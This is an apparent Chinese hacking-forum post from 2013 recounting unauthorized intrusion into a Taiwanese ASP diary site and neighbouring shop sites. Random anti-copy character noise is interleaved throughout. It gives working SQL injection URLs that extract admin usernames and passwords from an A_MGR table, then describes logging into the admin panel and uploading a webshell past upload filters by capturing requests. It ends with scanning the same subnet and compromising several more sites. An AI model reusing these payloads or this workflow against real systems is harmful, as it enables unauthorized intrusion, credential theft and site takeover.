发现一个注入点3 \) G/ i& j- K8 F. j& S# D# p& Y
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389& v7 D4 o! n5 g
9 x R* J4 b1 @9 j* y: c& _( c/ b7 M习惯性的加’having1=1--
. O2 n0 t/ z U) K! w
4 m. m/ c3 n4 c2 chttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—; w2 n1 b% L3 c% t# \! g
/ y) i7 G6 a7 v, d4 K7 j
0
% w' O" C, i3 ~. J+ c" c) u5 Y! r2 N6 T. s$ ~2 o
爆出Diary_A.dl_Title(这时候很激动啊)
6 F9 ?. i$ H% O$ O1 U) [/ e
0 j9 p3 n/ r% [ \/ ]# ] }那么继续
" H* n* j5 O* i. [) `http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
+ i9 w/ k9 ]3 a7 M# y6 ]% A V, i* g: W( T B( \
继续,一直爆下去: N8 q, c/ Q, q/ h3 n9 p
$ r$ |) Q/ V3 e4 q
爆到几个字段和表段 但是没找到需要的管理用户的字段
' P4 ^# Z7 I0 u5 M2 M* R4 P8 O5 P9 `
蛋疼了 怎么办 然后去后台登陆页看源码
; S' |4 \) I2 o& r; a' L, m9 N8 z& f y
04 }8 n* a# D/ y% ]1 z+ l0 e
8 @ X, m: c2 T0 j( v- g: C A+ s3 \
Input name= “ADUID”$ K2 h* V; J. H
Input name= “ADPWD”
6 [! N) m j% o. S/ @5 B# z9 {5 `: g, k% z$ F
很幸运 找到了字段那就继续
5 e/ b9 e# g, f3 ]& ?& B+ O+ M找到之后开始爆用户, w* }# N2 B+ F
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
{( A0 S) k; X; V; S2 S0 Y$ @& t" H爆密码
- `( R, `% I: G* Dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
% N5 B, Y7 n# v测试了下 这个注入点只能爆到文章哪里的表
8 y. c9 M. S- S: D2 F$ Y* b# [" f( z; i
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
$ ^$ n% \ V/ x" c1 s' l- H; _1 U( x$ J" d! b/ T! I
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
+ h1 D% j' S2 ^6 q# [" W8 x! B8 d3 P5 g4 G+ n: ^" }4 T
473
( Z2 l! n+ B; C: j$ c! ~) \6 V; g" n/ E; k
进后台0 V/ Y# H9 `3 N2 D+ H8 ^$ O
( \& I7 s$ E0 a! Y' q$ |9 a" i2 A
4 K" K- g) N! ~2 ^
发现几个上传点 有的地方不能上传 而且防止恶意代码
: Y) H" V2 B% `) j; I b. y- h0 ^0 X/ f* h
没办法 各种百度各种找大牛 找到一只好像可以突破的马
. _4 u2 k9 [$ ~, |, U1 O- j' y" I" P" W5 Q) I) k- _9 Y" ?
; x5 R! P" q2 R, `* g在系统管理那里直接上传 不过没有显示地址
% U( t7 n1 M7 R4 \9 ~- C% F1 F" e3 j' q* W+ A0 P, ]
再上传一次 抓包 搞定OK7 P5 [& q9 E8 [6 c, O* Z
5 w4 S: b: b* j F8 \" I7 C6 c
5 e2 S$ a9 X8 s( Q
, y2 B9 r, A) ^) s. d3 U$ V4724 H: D1 b4 F3 a- D2 w3 k% y
/ b- f/ [+ s2 ]' p) z, a晚上不行了 去睡觉。。。
9 i) V: E8 k5 X) H1 Y6 w第二天刚起床 闲的没事做继续日站吧 3 u/ z; m$ Y" x3 X x r
4 E) b I0 a" k# z$ }* q8 O7 `# j找个站 就把这个站的旁c扫了下5 E0 @5 U6 [. p) R' B
- Q2 x5 m# G; k' g' b X: @5 f7 l U发现c段也有一个购物站 ,然后还和这个站的模板差不多0 d' h, k' s0 o" v1 K. t
+ Y6 R$ S% z# E, f. C; r
就找到会员登录口测试. }3 c3 r3 y0 K! @" u
4 [8 F9 S( k, d. U5 s5 j'and (select top 1 MGR_UID from A_MGR)>0— j+ m& \+ C; q% h7 `4 u
果断爆到了 这时候我很激动 通杀0 q0 ~1 N7 P# R) e9 k5 x% r
4 i" s: ? r: t. H4 k
再次翻c段- K! g. w6 D2 m1 O
& e; E7 W, D( ^' s% y* C翻出几个站 都成功拿下
7 v* G, _* m/ v3 Y: m- \0 p8 x. O1 h
; Z' R6 n" O0 k/ c" ]( I7 D- }6 e4 Y' A$ }6 u2 R( C
修复方案: G% T0 S" ^% x/ E
他们比我专业 ' a: w% H$ D `( {* t0 J% a( |
* N( A5 Q2 q$ V7 m$ X! Z0 ^. \1 L/ f3 `& e$ k3 H* N! v
, o7 N/ L9 o; r9 B3 F; r, E
|
发表于 2013-4-4 17:40:38
收藏
支持
反对